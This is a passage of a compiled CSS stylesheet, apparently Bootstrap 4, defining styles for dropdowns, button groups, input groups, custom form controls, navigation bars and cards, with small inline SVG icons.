  margin-left: 0;
}

.dropleft .dropdown-toggle::before {
  vertical-align: 0;
}

.dropdown-divider {
  height: 0;
  margin: 0.5rem 0;
  overflow: hidden;
  border-top: 1px solid #e9ecef;
}

.dropdown-item {
  display: block;
  width: 100%;
  padding: 0.25rem 1.5rem;
  clear: both;
  font-weight: 400;
  color: #212529;
  text-align: inherit;
  white-space: nowrap;
  background-color: transparent;
  border: 0;
}

.dropdown-item:hover, .dropdown-item:focus {
  color: #16181b;
  text-decoration: none;
  background-color: #f8f9fa;
}

.dropdown-item.active, .dropdown-item:active {
  color: #fff;
  text-decoration: none;
  background-color: #007bff;
}

.dropdown-item.disabled, .dropdown-item:disabled {
  color: #6c757d;
  background-color: transparent;
}

.dropdown-menu.show {
  display: block;
}

.dropdown-header {
  display: block;
  padding: 0.5rem 1.5rem;
  margin-bottom: 0;
  font-size: 0.875rem;
  color: #6c757d;
  white-space: nowrap;
}

.btn-group,
.btn-group-vertical {
  position: relative;
  display: -webkit-inline-box;
  display: -ms-inline-flexbox;
  display: inline-flex;
  vertical-align: middle;
}

.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  -webkit-box-flex: 0;
  -ms-flex: 0 1 auto;
  flex: 0 1 auto;
}

.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover {
  z-index: 1;
}

.btn-group > .btn:focus, .btn-group > .btn:active, .btn-group > .btn.active,
.btn-group-vertical > .btn:focus,
.btn-group-vertical > .btn:active,
.btn-group-vertical > .btn.active {
  z-index: 1;
}

.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group,
.btn-group-vertical .btn + .btn,
.btn-group-vertical .btn + .btn-group,
.btn-group-vertical .btn-group + .btn,
.btn-group-vertical .btn-group + .btn-group {
  margin-left: -1px;
}

.btn-toolbar {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
  -webkit-box-pack: start;
  -ms-flex-pack: start;
  justify-content: flex-start;
}

.btn-toolbar .input-group {
  width: auto;
}

.btn-group > .btn:first-child {
  margin-left: 0;
}

.btn-group > .btn:not(:last-child):not(.dropdown-toggle),
.btn-group > .btn-group:not(:last-child) > .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}

.btn-group > .btn:not(:first-child),
.btn-group > .btn-group:not(:first-child) > .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}

.dropdown-toggle-split {
  padding-right: 0.5625rem;
  padding-left: 0.5625rem;
}

.dropdown-toggle-split::after {
  margin-left: 0;
}

.btn-sm + .dropdown-toggle-split, .btn-group-sm > .btn + .dropdown-toggle-split {
  padding-right: 0.375rem;
  padding-left: 0.375rem;
}

.btn-lg + .dropdown-toggle-split, .btn-group-lg > .btn + .dropdown-toggle-split {
  padding-right: 0.75rem;
  padding-left: 0.75rem;
}

.btn-group-vertical {
  -webkit-box-orient: vertical;
  -webkit-box-direction: normal;
  -ms-flex-direction: column;
  flex-direction: column;
  -webkit-box-align: start;
  -ms-flex-align: start;
  align-items: flex-start;
  -webkit-box-pack: center;
  -ms-flex-pack: center;
  justify-content: center;
}

.btn-group-vertical .btn,
.btn-group-vertical .btn-group {
  width: 100%;
}

.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-left: 0;
}

.btn-group-vertical > .btn:not(:last-child):not(.dropdown-toggle),
.btn-group-vertical > .btn-group:not(:last-child) > .btn {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}

.btn-group-vertical > .btn:not(:first-child),
.btn-group-vertical > .btn-group:not(:first-child) > .btn {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}

.btn-group-toggle > .btn,
.btn-group-toggle > .btn-group > .btn {
  margin-bottom: 0;
}

.btn-group-toggle > .btn input[type="radio"],
.btn-group-toggle > .btn input[type="checkbox"],
.btn-group-toggle > .btn-group > .btn input[type="radio"],
.btn-group-toggle > .btn-group > .btn input[type="checkbox"] {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}

.input-group {
  position: relative;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
  -webkit-box-align: stretch;
  -ms-flex-align: stretch;
  align-items: stretch;
  width: 100%;
}

.input-group > .form-control,
.input-group > .custom-select,
.input-group > .custom-file {
  position: relative;
  -webkit-box-flex: 1;
  -ms-flex: 1 1 auto;
  flex: 1 1 auto;
  width: 1%;
  margin-bottom: 0;
}

.input-group > .form-control:focus,
.input-group > .custom-select:focus,
.input-group > .custom-file:focus {
  z-index: 3;
}

.input-group > .form-control + .form-control,
.input-group > .form-control + .custom-select,
.input-group > .form-control + .custom-file,
.input-group > .custom-select + .form-control,
.input-group > .custom-select + .custom-select,
.input-group > .custom-select + .custom-file,
.input-group > .custom-file + .form-control,
.input-group > .custom-file + .custom-select,
.input-group > .custom-file + .custom-file {
  margin-left: -1px;
}

.input-group > .form-control:not(:last-child),
.input-group > .custom-select:not(:last-child) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}

.input-group > .form-control:not(:first-child),
.input-group > .custom-select:not(:first-child) {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}

.input-group > .custom-file {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -ms-flex-align: center;
  align-items: center;
}

.input-group > .custom-file:not(:last-child) .custom-file-label,
.input-group > .custom-file:not(:last-child) .custom-file-label::before {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}

.input-group > .custom-file:not(:first-child) .custom-file-label,
.input-group > .custom-file:not(:first-child) .custom-file-label::before {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}

.input-group-prepend,
.input-group-append {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
}

.input-group-prepend .btn,
.input-group-append .btn {
  position: relative;
  z-index: 2;
}

.input-group-prepend .btn + .btn,
.input-group-prepend .btn + .input-group-text,
.input-group-prepend .input-group-text + .input-group-text,
.input-group-prepend .input-group-text + .btn,
.input-group-append .btn + .btn,
.input-group-append .btn + .input-group-text,
.input-group-append .input-group-text + .input-group-text,
.input-group-append .input-group-text + .btn {
  margin-left: -1px;
}

.input-group-prepend {
  margin-right: -1px;
}

.input-group-append {
  margin-left: -1px;
}

.input-group-text {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -ms-flex-align: center;
  align-items: center;
  padding: 0.375rem 0.75rem;
  margin-bottom: 0;
  font-size: 1rem;
  font-weight: 400;
  line-height: 1.5;
  color: #495057;
  text-align: center;
  white-space: nowrap;
  background-color: #e9ecef;
  border: 1px solid #ced4da;
  border-radius: 0.25rem;
}

.input-group-text input[type="radio"],
.input-group-text input[type="checkbox"] {
  margin-top: 0;
}

.input-group > .input-group-prepend > .btn,
.input-group > .input-group-prepend > .input-group-text,
.input-group > .input-group-append:not(:last-child) > .btn,
.input-group > .input-group-append:not(:last-child) > .input-group-text,
.input-group > .input-group-append:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group > .input-group-append:last-child > .input-group-text:not(:last-child) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}

.input-group > .input-group-append > .btn,
.input-group > .input-group-append > .input-group-text,
.input-group > .input-group-prepend:not(:first-child) > .btn,
.input-group > .input-group-prepend:not(:first-child) > .input-group-text,
.input-group > .input-group-prepend:first-child > .btn:not(:first-child),
.input-group > .input-group-prepend:first-child > .input-group-text:not(:first-child) {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}

.custom-control {
  position: relative;
  display: block;
  min-height: 1.5rem;
  padding-left: 1.5rem;
}

.custom-control-inline {
  display: -webkit-inline-box;
  display: -ms-inline-flexbox;
  display: inline-flex;
  margin-right: 1rem;
}

.custom-control-input {
  position: absolute;
  z-index: -1;
  opacity: 0;
}

.custom-control-input:checked ~ .custom-control-label::before {
  color: #fff;
  background-color: #007bff;
}

.custom-control-input:focus ~ .custom-control-label::before {
  box-shadow: 0 0 0 1px #fff, 0 0 0 0.2rem rgba(0, 123, 255, 0.25);
}

.custom-control-input:active ~ .custom-control-label::before {
  color: #fff;
  background-color: #b3d7ff;
}

.custom-control-input:disabled ~ .custom-control-label {
  color: #6c757d;
}

.custom-control-input:disabled ~ .custom-control-label::before {
  background-color: #e9ecef;
}

.custom-control-label {
  margin-bottom: 0;
}

.custom-control-label::before {
  position: absolute;
  top: 0.25rem;
  left: 0;
  display: block;
  width: 1rem;
  height: 1rem;
  pointer-events: none;
  content: "";
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
  background-color: #dee2e6;
}

.custom-control-label::after {
  position: absolute;
  top: 0.25rem;
  left: 0;
  display: block;
  width: 1rem;
  height: 1rem;
  content: "";
  background-repeat: no-repeat;
  background-position: center center;
  background-size: 50% 50%;
}

.custom-checkbox .custom-control-label::before {
  border-radius: 0.25rem;
}

.custom-checkbox .custom-control-input:checked ~ .custom-control-label::before {
  background-color: #007bff;
}

.custom-checkbox .custom-control-input:checked ~ .custom-control-label::after {
  background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23fff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}

.custom-checkbox .custom-control-input:indeterminate ~ .custom-control-label::before {
  background-color: #007bff;
}

.custom-checkbox .custom-control-input:indeterminate ~ .custom-control-label::after {
  background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 4'%3E%3Cpath stroke='%23fff' d='M0 2h4'/%3E%3C/svg%3E");
}

.custom-checkbox .custom-control-input:disabled:checked ~ .custom-control-label::before {
  background-color: rgba(0, 123, 255, 0.5);
}

.custom-checkbox .custom-control-input:disabled:indeterminate ~ .custom-control-label::before {
  background-color: rgba(0, 123, 255, 0.5);
}

.custom-radio .custom-control-label::before {
  border-radius: 50%;
}

.custom-radio .custom-control-input:checked ~ .custom-control-label::before {
  background-color: #007bff;
}

.custom-radio .custom-control-input:checked ~ .custom-control-label::after {
  background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%23fff'/%3E%3C/svg%3E");
}

.custom-radio .custom-control-input:disabled:checked ~ .custom-control-label::before {
  background-color: rgba(0, 123, 255, 0.5);
}

.custom-select {
  display: inline-block;
  width: 100%;
  height: calc(2.25rem + 2px);
  padding: 0.375rem 1.75rem 0.375rem 0.75rem;
  line-height: 1.5;
  color: #495057;
  vertical-align: middle;
  background: #fff url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 5'%3E%3Cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3E%3C/svg%3E") no-repeat right 0.75rem center;
  background-size: 8px 10px;
  border: 1px solid #ced4da;
  border-radius: 0.25rem;
  -webkit-appearance: none;
  -moz-appearance: none;
  appearance: none;
}

.custom-select:focus {
  border-color: #80bdff;
  outline: 0;
  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.075), 0 0 5px rgba(128, 189, 255, 0.5);
}

.custom-select:focus::-ms-value {
  color: #495057;
  background-color: #fff;
}

.custom-select[multiple], .custom-select[size]:not([size="1"]) {
  height: auto;
  padding-right: 0.75rem;
  background-image: none;
}

.custom-select:disabled {
  color: #6c757d;
  background-color: #e9ecef;
}

.custom-select::-ms-expand {
  opacity: 0;
}

.custom-select-sm {
  height: calc(1.8125rem + 2px);
  padding-top: 0.375rem;
  padding-bottom: 0.375rem;
  font-size: 75%;
}

.custom-select-lg {
  height: calc(2.875rem + 2px);
  padding-top: 0.375rem;
  padding-bottom: 0.375rem;
  font-size: 125%;
}

.custom-file {
  position: relative;
  display: inline-block;
  width: 100%;
  height: calc(2.25rem + 2px);
  margin-bottom: 0;
}

.custom-file-input {
  position: relative;
  z-index: 2;
  width: 100%;
  height: calc(2.25rem + 2px);
  margin: 0;
  opacity: 0;
}

.custom-file-input:focus ~ .custom-file-control {
  border-color: #80bdff;
  box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.25);
}

.custom-file-input:focus ~ .custom-file-control::before {
  border-color: #80bdff;
}

.custom-file-input:lang(en) ~ .custom-file-label::after {
  content: "Browse";
}

.custom-file-label {
  position: absolute;
  top: 0;
  right: 0;
  left: 0;
  z-index: 1;
  height: calc(2.25rem + 2px);
  padding: 0.375rem 0.75rem;
  line-height: 1.5;
  color: #495057;
  background-color: #fff;
  border: 1px solid #ced4da;
  border-radius: 0.25rem;
}

.custom-file-label::after {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  z-index: 3;
  display: block;
  height: calc(calc(2.25rem + 2px) - 1px * 2);
  padding: 0.375rem 0.75rem;
  line-height: 1.5;
  color: #495057;
  content: "Browse";
  background-color: #e9ecef;
  border-left: 1px solid #ced4da;
  border-radius: 0 0.25rem 0.25rem 0;
}

.nav {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
  padding-left: 0;
  margin-bottom: 0;
  list-style: none;
}

.nav-link {
  display: block;
  padding: 0.5rem 1rem;
}

.nav-link:hover, .nav-link:focus {
  text-decoration: none;
}

.nav-link.disabled {
  color: #6c757d;
}

.nav-tabs {
  border-bottom: 1px solid #dee2e6;
}

.nav-tabs .nav-item {
  margin-bottom: -1px;
}

.nav-tabs .nav-link {
  border: 1px solid transparent;
  border-top-left-radius: 0.25rem;
  border-top-right-radius: 0.25rem;
}

.nav-tabs .nav-link:hover, .nav-tabs .nav-link:focus {
  border-color: #e9ecef #e9ecef #dee2e6;
}

.nav-tabs .nav-link.disabled {
  color: #6c757d;
  background-color: transparent;
  border-color: transparent;
}

.nav-tabs .nav-link.active,
.nav-tabs .nav-item.show .nav-link {
  color: #495057;
  background-color: #fff;
  border-color: #dee2e6 #dee2e6 #fff;
}

.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}

.nav-pills .nav-link {
  border-radius: 0.25rem;
}

.nav-pills .nav-link.active,
.nav-pills .show > .nav-link {
  color: #fff;
  background-color: #007bff;
}

.nav-fill .nav-item {
  -webkit-box-flex: 1;
  -ms-flex: 1 1 auto;
  flex: 1 1 auto;
  text-align: center;
}

.nav-justified .nav-item {
  -ms-flex-preferred-size: 0;
  flex-basis: 0;
  -webkit-box-flex: 1;
  -ms-flex-positive: 1;
  flex-grow: 1;
  text-align: center;
}

.tab-content > .tab-pane {
  display: none;
}

.tab-content > .active {
  display: block;
}

.navbar {
  position: relative;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
  -webkit-box-align: center;
  -ms-flex-align: center;
  align-items: center;
  -webkit-box-pack: justify;
  -ms-flex-pack: justify;
  justify-content: space-between;
  padding: 0.5rem 1rem;
}

.navbar > .container,
.navbar > .container-fluid {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
  -webkit-box-align: center;
  -ms-flex-align: center;
  align-items: center;
  -webkit-box-pack: justify;
  -ms-flex-pack: justify;
  justify-content: space-between;
}

.navbar-brand {
  display: inline-block;
  padding-top: 0.3125rem;
  padding-bottom: 0.3125rem;
  margin-right: 1rem;
  font-size: 1.25rem;
  line-height: inherit;
  white-space: nowrap;
}

.navbar-brand:hover, .navbar-brand:focus {
  text-decoration: none;
}

.navbar-nav {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: vertical;
  -webkit-box-direction: normal;
  -ms-flex-direction: column;
  flex-direction: column;
  padding-left: 0;
  margin-bottom: 0;
  list-style: none;
}

.navbar-nav .nav-link {
  padding-right: 0;
  padding-left: 0;
}

.navbar-nav .dropdown-menu {
  position: static;
  float: none;
}

.navbar-text {
  display: inline-block;
  padding-top: 0.5rem;
  padding-bottom: 0.5rem;
}

.navbar-collapse {
  -ms-flex-preferred-size: 100%;
  flex-basis: 100%;
  -webkit-box-flex: 1;
  -ms-flex-positive: 1;
  flex-grow: 1;
  -webkit-box-align: center;
  -ms-flex-align: center;
  align-items: center;
}

.navbar-toggler {
  padding: 0.25rem 0.75rem;
  font-size: 1.25rem;
  line-height: 1;
  background-color: transparent;
  border: 1px solid transparent;
  border-radius: 0.25rem;
}

.navbar-toggler:hover, .navbar-toggler:focus {
  text-decoration: none;
}

.navbar-toggler:not(:disabled):not(.disabled) {
  cursor: pointer;
}

.navbar-toggler-icon {
  display: inline-block;
  width: 1.5em;
  height: 1.5em;
  vertical-align: middle;
  content: "";
  background: no-repeat center center;
  background-size: 100% 100%;
}

@media (max-width: 575.98px) {
  .navbar-expand-sm > .container,
  .navbar-expand-sm > .container-fluid {
    padding-right: 0;
    padding-left: 0;
  }
}

@media (min-width: 576px) {
  .navbar-expand-sm {
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-flow: row nowrap;
    flex-flow: row nowrap;
    -webkit-box-pack: start;
    -ms-flex-pack: start;
    justify-content: flex-start;
  }
  .navbar-expand-sm .navbar-nav {
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-direction: row;
    flex-direction: row;
  }
  .navbar-expand-sm .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-sm .navbar-nav .dropdown-menu-right {
    right: 0;
    left: auto;
  }
  .navbar-expand-sm .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-sm > .container,
  .navbar-expand-sm > .container-fluid {
    -ms-flex-wrap: nowrap;
    flex-wrap: nowrap;
  }
  .navbar-expand-sm .navbar-collapse {
    display: -webkit-box !important;
    display: -ms-flexbox !important;
    display: flex !important;
    -ms-flex-preferred-size: auto;
    flex-basis: auto;
  }
  .navbar-expand-sm .navbar-toggler {
    display: none;
  }
  .navbar-expand-sm .dropup .dropdown-menu {
    top: auto;
    bottom: 100%;
  }
}

@media (max-width: 767.98px) {
  .navbar-expand-md > .container,
  .navbar-expand-md > .container-fluid {
    padding-right: 0;
    padding-left: 0;
  }
}

@media (min-width: 768px) {
  .navbar-expand-md {
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-flow: row nowrap;
    flex-flow: row nowrap;
    -webkit-box-pack: start;
    -ms-flex-pack: start;
    justify-content: flex-start;
  }
  .navbar-expand-md .navbar-nav {
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-direction: row;
    flex-direction: row;
  }
  .navbar-expand-md .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-md .navbar-nav .dropdown-menu-right {
    right: 0;
    left: auto;
  }
  .navbar-expand-md .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-md > .container,
  .navbar-expand-md > .container-fluid {
    -ms-flex-wrap: nowrap;
    flex-wrap: nowrap;
  }
  .navbar-expand-md .navbar-collapse {
    display: -webkit-box !important;
    display: -ms-flexbox !important;
    display: flex !important;
    -ms-flex-preferred-size: auto;
    flex-basis: auto;
  }
  .navbar-expand-md .navbar-toggler {
    display: none;
  }
  .navbar-expand-md .dropup .dropdown-menu {
    top: auto;
    bottom: 100%;
  }
}

@media (max-width: 991.98px) {
  .navbar-expand-lg > .container,
  .navbar-expand-lg > .container-fluid {
    padding-right: 0;
    padding-left: 0;
  }
}

@media (min-width: 992px) {
  .navbar-expand-lg {
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-flow: row nowrap;
    flex-flow: row nowrap;
    -webkit-box-pack: start;
    -ms-flex-pack: start;
    justify-content: flex-start;
  }
  .navbar-expand-lg .navbar-nav {
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-direction: row;
    flex-direction: row;
  }
  .navbar-expand-lg .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-lg .navbar-nav .dropdown-menu-right {
    right: 0;
    left: auto;
  }
  .navbar-expand-lg .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-lg > .container,
  .navbar-expand-lg > .container-fluid {
    -ms-flex-wrap: nowrap;
    flex-wrap: nowrap;
  }
  .navbar-expand-lg .navbar-collapse {
    display: -webkit-box !important;
    display: -ms-flexbox !important;
    display: flex !important;
    -ms-flex-preferred-size: auto;
    flex-basis: auto;
  }
  .navbar-expand-lg .navbar-toggler {
    display: none;
  }
  .navbar-expand-lg .dropup .dropdown-menu {
    top: auto;
    bottom: 100%;
  }
}

@media (max-width: 1199.98px) {
  .navbar-expand-xl > .container,
  .navbar-expand-xl > .container-fluid {
    padding-right: 0;
    padding-left: 0;
  }
}

@media (min-width: 1200px) {
  .navbar-expand-xl {
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-flow: row nowrap;
    flex-flow: row nowrap;
    -webkit-box-pack: start;
    -ms-flex-pack: start;
    justify-content: flex-start;
  }
  .navbar-expand-xl .navbar-nav {
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-direction: row;
    flex-direction: row;
  }
  .navbar-expand-xl .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-xl .navbar-nav .dropdown-menu-right {
    right: 0;
    left: auto;
  }
  .navbar-expand-xl .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-xl > .container,
  .navbar-expand-xl > .container-fluid {
    -ms-flex-wrap: nowrap;
    flex-wrap: nowrap;
  }
  .navbar-expand-xl .navbar-collapse {
    display: -webkit-box !important;
    display: -ms-flexbox !important;
    display: flex !important;
    -ms-flex-preferred-size: auto;
    flex-basis: auto;
  }
  .navbar-expand-xl .navbar-toggler {
    display: none;
  }
  .navbar-expand-xl .dropup .dropdown-menu {
    top: auto;
    bottom: 100%;
  }
}

.navbar-expand {
  -webkit-box-orient: horizontal;
  -webkit-box-direction: normal;
  -ms-flex-flow: row nowrap;
  flex-flow: row nowrap;
  -webkit-box-pack: start;
  -ms-flex-pack: start;
  justify-content: flex-start;
}

.navbar-expand > .container,
.navbar-expand > .container-fluid {
  padding-right: 0;
  padding-left: 0;
}

.navbar-expand .navbar-nav {
  -webkit-box-orient: horizontal;
  -webkit-box-direction: normal;
  -ms-flex-direction: row;
  flex-direction: row;
}

.navbar-expand .navbar-nav .dropdown-menu {
  position: absolute;
}

.navbar-expand .navbar-nav .dropdown-menu-right {
  right: 0;
  left: auto;
}

.navbar-expand .navbar-nav .nav-link {
  padding-right: 0.5rem;
  padding-left: 0.5rem;
}

.navbar-expand > .container,
.navbar-expand > .container-fluid {
  -ms-flex-wrap: nowrap;
  flex-wrap: nowrap;
}

.navbar-expand .navbar-collapse {
  display: -webkit-box !important;
  display: -ms-flexbox !important;
  display: flex !important;
  -ms-flex-preferred-size: auto;
  flex-basis: auto;
}

.navbar-expand .navbar-toggler {
  display: none;
}

.navbar-expand .dropup .dropdown-menu {
  top: auto;
  bottom: 100%;
}

.navbar-light .navbar-brand {
  color: rgba(0, 0, 0, 0.9);
}

.navbar-light .navbar-brand:hover, .navbar-light .navbar-brand:focus {
  color: rgba(0, 0, 0, 0.9);
}

.navbar-light .navbar-nav .nav-link {
  color: rgba(0, 0, 0, 0.5);
}

.navbar-light .navbar-nav .nav-link:hover, .navbar-light .navbar-nav .nav-link:focus {
  color: rgba(0, 0, 0, 0.7);
}

.navbar-light .navbar-nav .nav-link.disabled {
  color: rgba(0, 0, 0, 0.3);
}

.navbar-light .navbar-nav .show > .nav-link,
.navbar-light .navbar-nav .active > .nav-link,
.navbar-light .navbar-nav .nav-link.show,
.navbar-light .navbar-nav .nav-link.active {
  color: rgba(0, 0, 0, 0.9);
}

.navbar-light .navbar-toggler {
  color: rgba(0, 0, 0, 0.5);
  border-color: rgba(0, 0, 0, 0.1);
}

.navbar-light .navbar-toggler-icon {
  background-image: url("data:image/svg+xml;charset=utf8,%3Csvg viewBox='0 0 30 30' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath stroke='rgba(0, 0, 0, 0.5)' stroke-width='2' stroke-linecap='round' stroke-miterlimit='10' d='M4 7h22M4 15h22M4 23h22'/%3E%3C/svg%3E");
}

.navbar-light .navbar-text {
  color: rgba(0, 0, 0, 0.5);
}

.navbar-light .navbar-text a {
  color: rgba(0, 0, 0, 0.9);
}

.navbar-light .navbar-text a:hover, .navbar-light .navbar-text a:focus {
  color: rgba(0, 0, 0, 0.9);
}

.navbar-dark .navbar-brand {
  color: #fff;
}

.navbar-dark .navbar-brand:hover, .navbar-dark .navbar-brand:focus {
  color: #fff;
}

.navbar-dark .navbar-nav .nav-link {
  color: rgba(255, 255, 255, 0.5);
}

.navbar-dark .navbar-nav .nav-link:hover, .navbar-dark .navbar-nav .nav-link:focus {
  color: rgba(255, 255, 255, 0.75);
}

.navbar-dark .navbar-nav .nav-link.disabled {
  color: rgba(255, 255, 255, 0.25);
}

.navbar-dark .navbar-nav .show > .nav-link,
.navbar-dark .navbar-nav .active > .nav-link,
.navbar-dark .navbar-nav .nav-link.show,
.navbar-dark .navbar-nav .nav-link.active {
  color: #fff;
}

.navbar-dark .navbar-toggler {
  color: rgba(255, 255, 255, 0.5);
  border-color: rgba(255, 255, 255, 0.1);
}

.navbar-dark .navbar-toggler-icon {
  background-image: url("data:image/svg+xml;charset=utf8,%3Csvg viewBox='0 0 30 30' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath stroke='rgba(255, 255, 255, 0.5)' stroke-width='2' stroke-linecap='round' stroke-miterlimit='10' d='M4 7h22M4 15h22M4 23h22'/%3E%3C/svg%3E");
}

.navbar-dark .navbar-text {
  color: rgba(255, 255, 255, 0.5);
}

.navbar-dark .navbar-text a {
  color: #fff;
}

.navbar-dark .navbar-text a:hover, .navbar-dark .navbar-text a:focus {
  color: #fff;
}

.card {
  position: relative;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: vertical;
  -webkit-box-direction: normal;
  -ms-flex-direction: column;
  flex-direction: column;
  min-width: 0;
  word-wrap: break-word;
  background-color: #fff;
  background-clip: border-box;
  border: 1px solid rgba(0, 0, 0, 0.125);
  border-radius: 0.25rem;
}

.card > hr {
  margin-right: 0;
  margin-left: 0;
}

.card > .list-group:first-child .list-group-item:first-child {
  border-top-left-radius: 0.25rem;
  border-top-right-radius: 0.25rem;
}

.card > .list-group:last-child .list-group-item:last-child {
  border-bottom-right-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}

.card-body {
  -webkit-box-flex: 1;
  -ms-flex: 1 1 auto;
  flex: 1 1 auto;
  padding: 1.25rem;
}

.card-title {
  margin-bottom: 0.75rem;
}

.card-subtitle {
  margin-top: -0.375rem;
  margin-bottom: 0;
}

.card-text:last-child {
  margin-bottom: 0;
}

.card-link:hover {
  text-decoration: none;
}

.card-link + .card-link {
  margin-left: 1.25rem;
}

.card-header {
  padding: 0.75rem 1.25rem;
  margin-bottom: 0;
  background-color: rgba(0, 0, 0, 0.03);
  border-bottom: 1px solid rgba(0, 0, 0, 0.125);
}

.card-header:first-child {
  border-radius: calc(0.25rem - 1px) calc(0.25rem - 1px) 0 0;
}

.card-header + .list-group .list-group-item:first-child {
  border-top: 0;
}

.card-footer {
  padding: 0.75rem 1.25rem;
  background-color: rgba(0, 0, 0, 0.03);
  border-top: 1px solid rgba(0, 0, 0, 0.125);
}

.card-footer:last-child {
  border-radius: 0 0 calc(0.25rem - 1px) calc(0.25rem - 1px);
}

.card-header-tabs {
  margin-right: -0.625rem;
  margin-bottom: -0.75rem;
  margin-left: -0.625rem;
  border-bottom: 0;
}

.card-header-pills {
  margin-right: -0.625rem;
  margin-left: -0.625rem;
}

.card-img-overlay {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  padding: 1.25rem;
}

.card-img {
  width: 100%;
  border-radius: calc(0.25rem - 1px);
}

.card-img-top {
  width: 100%;
  border-top-left-radius: calc(0.25rem - 1px);
  border-top-right-radius: calc(0.25rem - 1px);
}

.card-img-bottom {
  width: 100%;
  border-bottom-right-radius: calc(0.25rem - 1px);
  border-bottom-left-radius: calc(0.25rem - 1px);
}

.card-deck {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: vertical;
  -webkit-box-direction: normal;
  -ms-flex-direction: column;
  flex-direction: column;
}

.card-deck .card {
  margin-bottom: 15px;
}

@media (min-width: 576px) {
  .card-deck {
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-flow: row wrap;
    flex-flow: row wrap;
    margin-right: -15px;
    margin-left: -15px;
  }
  .card-deck .card {
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-flex: 1;
    -ms-flex: 1 0 0%;
    flex: 1 0 0%;
    -webkit-box-orient: vertical;
    -webkit-box-direction: normal;
    -ms-flex-direction: column;
    flex-direction: column;
    margin-right: 15px;
    margin-bottom: 0;
    margin-left: 15px;
  }
}

.card-group {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: vertical;
  -webkit-box-direction: normal;
  -ms-flex-direction: column;
  flex-direction: column;
}

